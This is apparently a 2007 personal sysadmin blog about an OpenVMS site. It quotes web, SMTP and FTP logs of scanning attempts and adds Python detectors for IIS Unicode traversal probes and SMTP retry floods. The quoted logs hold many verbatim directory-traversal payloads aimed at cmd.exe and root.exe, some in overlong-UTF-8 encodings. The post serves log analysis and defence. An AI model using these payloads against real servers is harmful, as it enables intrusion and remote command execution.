One more day of (mail) bombing

In yesterday’s post I mentioned a server trying to deliver something, blocked because its address cannot be translated back to a host name, once every two minutes or so.
Well, it continued until this, the last entry:

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable to a host name

OPERATOR.LOG is over four times its usual size. Four times, I guess, because Persephone (the PersonalAlpha on Demeter) was added to the cluster yesterday, over wireless (what real Alpha could do that!), and that added some extra lines as well.

Who says Windows is secure….

Surely just a script making a lot of attempts to break into a Windows system, but this is what I found in last week’s web server log:
222.189.7.29 - - [13/Feb/2007:07:25:54 +0100] "GET /cgi-bin/query/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:25:55 +0100] "GET /cgi-bin/query/scripts/root.exe?/c+dir HTTP/1.0" 404 782
222.189.7.29 - - [13/Feb/2007:07:25:59 +0100] "GET /cgi-bin/query/msadc/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:00 +0100] "GET /cgi-bin/query/msadc/..À/../..À/../..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:01 +0100] "GET /cgi-bin/query/msadc/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:05 +0100] "GET /cgi-bin/query/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:06 +0100] "GET /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:07 +0100] "GET /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:08 +0100] "GET /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:09 +0100] "GET /cgi-bin/query/scripts/..À/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:10 +0100] "GET /cgi-bin/query/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:11 +0100] "GET /cgi-bin/query/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 815
222.189.7.29 - - [13/Feb/2007:07:26:12 +0100] "GET /cgi-bin/query/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:17 +0100] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:18 +0100] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:19 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:21 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:22 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:23 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:24 +0100] "GET /cgi-bin/query/scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 811
222.189.7.29 - - [13/Feb/2007:07:26:25 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787
222.189.7.29 - - [13/Feb/2007:07:26:26 +0100] "GET /cgi-bin/query/scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:27 +0100] "GET /cgi-bin/query/scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:28 +0100] "GET /cgi-bin/query/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 776
222.189.7.29 - - [13/Feb/2007:07:26:29 +0100] "GET /cgi-bin/query/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 802
222.189.7.29 - - [13/Feb/2007:07:26:30 +0100] "GET /cgi-bin/query/scripts/cmd.exe?/c+dir HTTP/1.0" 404 781
222.189.7.29 - - [13/Feb/2007:07:26:31 +0100] "GET /scripts/cmd32.exe" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:32 +0100] "GET /cgi-bin/query/scripts/cmd32.exe?/c+dir HTTP/1.0" 404 783
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:33 +0100] "GET /cgi-bin/query/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 774
222.189.7.29 - - [13/Feb/2007:07:26:34 +0100] "GET /cgi-bin/query/msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 800
222.189.7.29 - - [13/Feb/2007:07:26:35 +0100] "GET /cgi-bin/query/script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 801
222.189.7.29 - - [13/Feb/2007:07:26:36 +0100] "GET /cgi-bin/query/_mem_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:37 +0100] "GET /cgi-bin/query/_mem_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:38 +0100] "GET /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:39 +0100] "GET /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:43 +0100] "GET /cgi-bin/query/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:44 +0100] "GET /cgi-bin/query/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:45 +0100] "GET /cgi-bin/query/_vti_bin/..À/..À/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:49 +0100] "GET /cgi-bin/query/_vti_bin/..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:50 +0100] "GET /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 403 671
222.189.7.29 - - [13/Feb/2007:07:26:51 +0100] "GET /cgi-bin/query/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 809
222.189.7.29 - - [13/Feb/2007:07:26:52 +0100] "GET /cgi-bin/query/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 777
222.189.7.29 - - [13/Feb/2007:07:26:53 +0100] "GET /cgi-bin/query/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 803
222.189.7.29 - - [13/Feb/2007:07:26:54 +0100] "GET /cgi-bin/query/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 812
222.189.7.29 - - [13/Feb/2007:07:26:55 +0100] "GET /cgi-bin/query/bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
222.189.7.29 - - [13/Feb/2007:07:26:56 +0100] "GET /cgi-bin/query/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 806
222.189.7.29 - - [13/Feb/2007:07:26:57 +0100] "GET /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:58 +0100] "GET /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:26:59 +0100] "GET /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:00 +0100] "GET /cgi-bin/../../../../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:03 +0100] "GET /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:04 +0100] "GET /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:05 +0100] "GET /cgi-Bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:06 +0100] "GET /cgi-bin/cmd.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675
222.189.7.29 - - [13/Feb/2007:07:27:07 +0100] "GET /Cgi-Bin/cmd32.exe?/c+dir" 404 675

Clearly someone running a script, and I seriously doubt his knowledge… Just trying to see if he can get in. Or espionage? The address is said to be located in China:

inetnum: 222.184.0.0 - 222.191.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-JS
mnt-routes: MAINT-CHINANET-JS
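The request set above is the classic probe for the IIS Unicode folder-traversal bug (MS00-078): `..%c0%af..` and `..%c1%9c..` are overlong UTF-8 encodings of `/` and `\` that a conforming decoder rejects but the vulnerable IIS decoder accepted, so a filter that looked for `../` in the raw URL saw nothing. `..%255c..` is the double-decode variant, and `root.exe` is the backdoor copy of `cmd.exe` that Code Red II left behind; the Nimda worm and the scanning scripts that copied it send exactly this sequence. The WASD server here answered 403 and 404, so nothing got through, but the encoding trick is worth seeing decoded. The following is an added example, not code from the original post: a small Python detector that decodes the way IIS did and flags requests whose traversal only appears after decoding. The log lines are constructed after the pattern in the post, with RFC 5737 documentation addresses, and the target list is an assumption.

```python
"""Spotting IIS Unicode / overlong-UTF-8 traversal probes in an access log.
Added example; sample lines are constructed, not a real log excerpt."""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Common/combined log format: client IP, timestamp, "METHOD path ...", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>[^\s"]+)'
)

TARGETS = {"cmd.exe", "cmd32.exe", "root.exe"}  # assumed list of probe targets


def strict_utf8_ok(raw: bytes) -> bool:
    """A conforming decoder rejects overlong forms such as C0 AF ('/')."""
    try:
        raw.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def iis_lenient_decode(raw: bytes) -> str:
    """Decode two-byte sequences the way the vulnerable IIS decoder did:
    low five bits of a 0xC0-0xDF lead byte plus low six bits of the *next*
    byte, without checking that it is a 10xxxxxx continuation byte.
    So C0 AF -> '/', C1 9C -> '\\', and the malformed C1 1C -> '\\' too.
    Everything else is passed through as Latin-1."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def normalize_path(path: str, passes: int = 2) -> str:
    """Percent-decode then lenient-decode, repeated so double-encoded forms
    like ..%255c.. (-> ..%5c.. -> ..\\..) unfold too; then fold '\\' to '/'."""
    cur = path
    for _ in range(passes):
        decoded = iis_lenient_decode(unquote_to_bytes(cur))
        if decoded == cur:
            break
        cur = decoded
    return cur.replace("\\", "/")


def traversal_depth(p: str) -> int:
    """Number of '..' segments followed by a separator."""
    return len(re.findall(r"\.\.[/\\]", p))


def classify_request(path: str):
    """Reason string for a probe-looking request, or None. 'encoded traversal'
    means the ../ only appeared after decoding: what a raw-URL filter misses."""
    norm = normalize_path(path)
    reasons = []
    depth = traversal_depth(norm)
    if depth:
        reasons.append("encoded traversal" if depth > traversal_depth(path) else "traversal")
    base = norm.split("?", 1)[0].rsplit("/", 1)[-1].lower()
    if base in TARGETS:
        reasons.append(f"command probe ({base})")
    return ", ".join(reasons) or None


def scan_log(lines):
    """Return (ip, raw_path, reason) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m["path"])
        if reason:
            hits.append((m["ip"], m["path"], reason))
    return hits


def probes_per_ip(hits) -> Counter:
    return Counter(ip for ip, _, _ in hits)


# Constructed sample (RFC 5737 addresses), modelled on the pattern in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Feb/2007:07:26:13 +0100] "GET /scripts/..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 671',
    '203.0.113.7 - - [13/Feb/2007:07:26:20 +0100] "GET /cgi-bin/query/scripts/../../cmd.exe?/c+dir HTTP/1.0" 404 787',
    '203.0.113.7 - - [13/Feb/2007:07:26:21 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 782',
    '203.0.113.7 - - [13/Feb/2007:07:26:22 +0100] "GET /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 671',
    '203.0.113.7 - - [13/Feb/2007:07:26:23 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 671',
    '198.51.100.3 - - [13/Feb/2007:07:30:00 +0100] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, path, reason in hits:
        print(f"{ip}  {reason:42s} {path}")
    print(probes_per_ip(hits))
```

The point of `iis_lenient_decode()` is that the same bytes are harmless to a strict decoder and a path separator to a broken one; a detector, like a web server, has to normalise before it matches. Lines the server has already decoded (the `..À¯..` form in the post) would need to be read as raw Latin-1 bytes rather than text, which this example does not do.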

Apart from this, just a few that appear quite regularly:

69.84.207.37 - - [12/Feb/2007:07:02:35 +0100] "GET /No%0Ate-email.htm HTTP/1.1" 403 864
69.84.207.37 - - [12/Feb/2007:07:06:27 +0100] "GET /cgi-bin/count.exe HTTP/1.1" 502 900
69.84.207.37 - - [12/Feb/2007:07:06:28 +0100] "GET /cgi-bin/c%0Aount.exe HTTP/1.1" 404 887
207.234.131.90 - - [12/Feb/2007:09:56:37 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

There are just a few of these, not many in a week.
Mail
Someone is trying to blow up the SMTP server, for over 24 hours now:
%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.71 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4977

%%%%%%%%%%% OPCOM 18-FEB-2007 14:46:13.92 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
...
%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:57.98 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 84.246.98.2 Port: 4144

%%%%%%%%%%% OPCOM 19-FEB-2007 22:50:58.15 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 84.246.98.2 is not backtranslatable
to a host name

I haven’t counted the entries, but the attempts occur every two minutes or so. Alas, the router has no way to block him there…
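Counting those OPCOM entries by hand is tedious, and the interesting number is not the count but the rhythm: a host that comes back every two minutes for over a day is a retrying queue, not a person. As an added example (not code from the original post), here is a Python script that parses records in the format quoted above and profiles each source by count, time span and median interval between connections. The input is constructed in the same format, with RFC 5737 addresses; `has_ptr()` performs the reverse lookup that TCPIP$SMTP does before it logs SMTP_UNBKTRNSIP and is the only function that touches the network. The thresholds in `persistent_sources()` are assumptions.

```python
"""Profile SMTP connection attempts from OpenVMS OPCOM messages.
Added example; the log text is constructed, not a real excerpt."""
import re
import socket
from datetime import datetime, timedelta
from statistics import median

OPCOM_HDR = re.compile(r"^%+\s+OPCOM\s+(\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+)\s+%+")
SMTP_ACCEPT = re.compile(r"SMTP Accept Request from Host: (\S+) Port: (\d+)")
NO_PTR = re.compile(r"client IP address (\S+) is not backtranslatable")


def parse_opcom(text: str):
    """Return (timestamp, kind, ip) tuples, kind in {'accept', 'noptr'}.
    The timestamp lives on the %%% header that precedes each message."""
    ts, events = None, []
    for line in text.splitlines():
        m = OPCOM_HDR.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%d-%b-%Y %H:%M:%S.%f")
            continue
        if ts is None:
            continue
        m = SMTP_ACCEPT.search(line)
        if m:
            events.append((ts, "accept", m.group(1)))
            continue
        m = NO_PTR.search(line)
        if m:
            events.append((ts, "noptr", m.group(1)))
    return events


def connection_stats(events, kind="accept"):
    """Per source IP: how many, over how many hours, and the median gap in
    seconds between consecutive attempts (None for a single attempt)."""
    per_ip = {}
    for ts, k, ip in events:
        if k == kind:
            per_ip.setdefault(ip, []).append(ts)
    stats = {}
    for ip, times in per_ip.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        stats[ip] = {
            "count": len(times),
            "span_hours": (times[-1] - times[0]).total_seconds() / 3600,
            "median_gap_s": median(gaps) if gaps else None,
        }
    return stats


def persistent_sources(stats, min_count=20, max_median_gap_s=600, min_span_hours=1.0):
    """Sources retrying at a steady, short interval for hours (thresholds assumed)."""
    return sorted(
        ip for ip, s in stats.items()
        if s["count"] >= min_count
        and s["span_hours"] >= min_span_hours
        and s["median_gap_s"] is not None
        and s["median_gap_s"] <= max_median_gap_s
    )


def has_ptr(ip: str) -> bool:
    """Live reverse lookup; False is the condition SMTP_UNBKTRNSIP reports."""
    try:
        socket.gethostbyaddr(ip)
        return True
    except (socket.herror, socket.gaierror):
        return False


def build_sample_log() -> str:
    """Constructed OPCOM excerpt: one host without a PTR record connecting
    every two minutes for three hours, plus one ordinary delivery."""
    out = []

    def record(ts, user, body):
        stamp = ts.strftime("%d-%b-%Y %H:%M:%S.%f")[:-4].upper()
        out.extend([f"%%%%%%%%%%%  OPCOM  {stamp}  %%%%%%%%%%%",
                    f"Message from user {user} on DIANA", body, ""])

    start = datetime(2007, 2, 18, 14, 46, 13)
    for i in range(90):
        ts = start + timedelta(seconds=120 * i)
        record(ts, "INTERnet",
               f"INTERnet ACP SMTP Accept Request from Host: 203.0.113.9 Port: {4000 + i}")
        record(ts + timedelta(milliseconds=210), "TCPIP$SMTP",
               "%TCPIP-W-SMTP_UNBKTRNSIP, client IP address 203.0.113.9 "
               "is not backtranslatable to a host name")
    record(start + timedelta(minutes=37), "INTERnet",
           "INTERnet ACP SMTP Accept Request from Host: 198.51.100.25 Port: 51234")
    return "\n".join(out)


if __name__ == "__main__":
    stats = connection_stats(parse_opcom(build_sample_log()))
    for ip in persistent_sources(stats):
        print(ip, stats[ip], "PTR:" , has_ptr(ip))
```

A legitimate but misconfigured relay produces the same steady retry pattern as a hostile one, so treat the output as a list of addresses to report or rate-limit, as the post does, rather than an automatic block list; the missing reverse record is the extra signal that makes the complaint to the ISP easy to write.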
This address is a UK one:
inetnum: 84.246.96.0 - 84.246.103.255
netname: UK-WH-UK-20040830
descr: World Hub Limited
descr: PROVIDER Local Registry
country: GB # US
org: ORG-WHL1-RIPE
admin-c: DA1277-RIPE
tech-c: DA1277-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: worldhub-ip
mnt-routes: worldhub-ip
source: RIPE # Filtered

Both ISP’s will be informed.

19-Feb-2007

Quiet on all fronts
That is: nothing but the usual to be done. I still have to process the FTP logs, but that will be part of the full overhaul of the whole site. I think I’ll use another program as a portal, another PHP-based program including forums (Phorum, as used by OpenVMS.org, is currently under investigation), or perhaps even something I create myself.
Stay tuned….
Windows woes
The problems with updates on Aphrodite have not been solved. Though the system states that the updates are actually installed, some show up time and again and have to be hidden manually so they stop showing up. I’m not sure Microsoft is really investigating….
PHP woes
Once in a while the PHP engine breaks and the server complains that it doesn’t get a valid response. This applies to both the blog and the forums; messages like this occur in the web server logs:
%HTTPD-W-NOTICED, 17-FEB-2007 16:34:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 213.84.186.159
-NOTICED-I-URI, GET (66 bytes) /forums/login.php?logout=true&sid=4e53a23d769172fb7e0d205a5106e3ac
-NOTICED-I-SCRIPT, /forums/login.php forums:[000000]login.php (cgi_exe:phpwasd.exe) FORUMS:[000000]login.php
-NOTICED-I-CGI, xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx (129 bytes) %SYSTEM-F-HPARITH, high performance arithmetic trap, Imask=00000000, Fmask=00000002, summary=02, PC=00000000001E9C94, PS=0000001B
-NOTICED-I-RXTX, err:0/0 raw:708/0 net:708/0

The only solution I found seems to be: restart the web browser…

Some keep trying

Just one tried to get into the anonymous area yesterday; this is what OPERATOR.LOG says:
%%%%%%%%%%% OPCOM 13-FEB-2007 04:15:37.63 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: p548C9062.dip0.t-ipconnect.de
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.070213041515p]


It has been a long time since I saw these messages. Checking the logging of anonymous FTP, there have been some attempts, but it’s all very, very quiet here. However, for some reason the log files do not show up in the operator desk, so that’s something to look into.
The oldest, after the link from the main page was removed, goes back to 13-Nov-2006, and once in a while, once or twice a month, someone comes along to try to host some files. But the area is set to read-only, so that is bound to fail. Since most don’t have a clue what they’re doing, they try to access “standard” directories. That is: standard for Linux or Windows, or for some packages.

13-FEB-2007 04:15:36.20 User:anonymous logged in ident:Agpuser@home.com from Host:p548C9062.dip0.t-ipconnect.de
13-FEB-2007 04:15:37.54 User:anonymous ident:Agpuser@home.com status:00010001 CWD dir:WEB_DISK2:[public.anonymous]
13-FEB-2007 04:15:39.24 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]tagged
13-FEB-2007 04:15:39.32 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Tagged
13-FEB-2007 04:15:39.40 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]TaGGeD
13-FEB-2007 04:15:39.48 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]data
13-FEB-2007 04:15:39.57 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]Data
13-FEB-2007 04:15:39.65 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]^%
13-FEB-2007 04:15:39.74 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$SCRATCH^:
13-FEB-2007 04:15:39.82 User:anonymous ident:Agpuser@home.com status:07649912 CWD dir:SYS$POSIX_ROOT^:^[000000^]T^^^@gged
13-FEB-2007 04:15:39.90 User:anonymous ident:Agpuser@home.com logged out

The same is observed on web access at times. The latest evidence, from last week’s log:

219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /thisdoesnotexistahaha.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:28 +0100] "GET /cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:29 +0100] "GET /cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cacti/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:30 +0100] "GET /portal/cmd.php HTTP/1.1" 302 360
219.122.14.36 - - [07/Feb/2007:19:16:31 +0100] "GET /stats/cmd.php HTTP/1.1" 302 360

but some abandon the attempt right away:
213.247.43.35 - - [11/Feb/2007:07:25:24 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 893

06-Feb-2007

One more Alpha
That is: more or less.
To be installed on Demeter, the company laptop: PersonalAlpha. Not a big, fast box, but enough to get along without the real thing at hand. That means I can do everything I ever want to do on my laptop, exchanging files between that VMS box and any other on the network.
The software can be downloaded, free of charge, from EmulatorsInternational. Hit the download link and save the file. Also download mkimage.com from the utilities download page of Software Resources International (get the Communications and Utilities manual from there as well) to create copies of your VMS installation CD(s).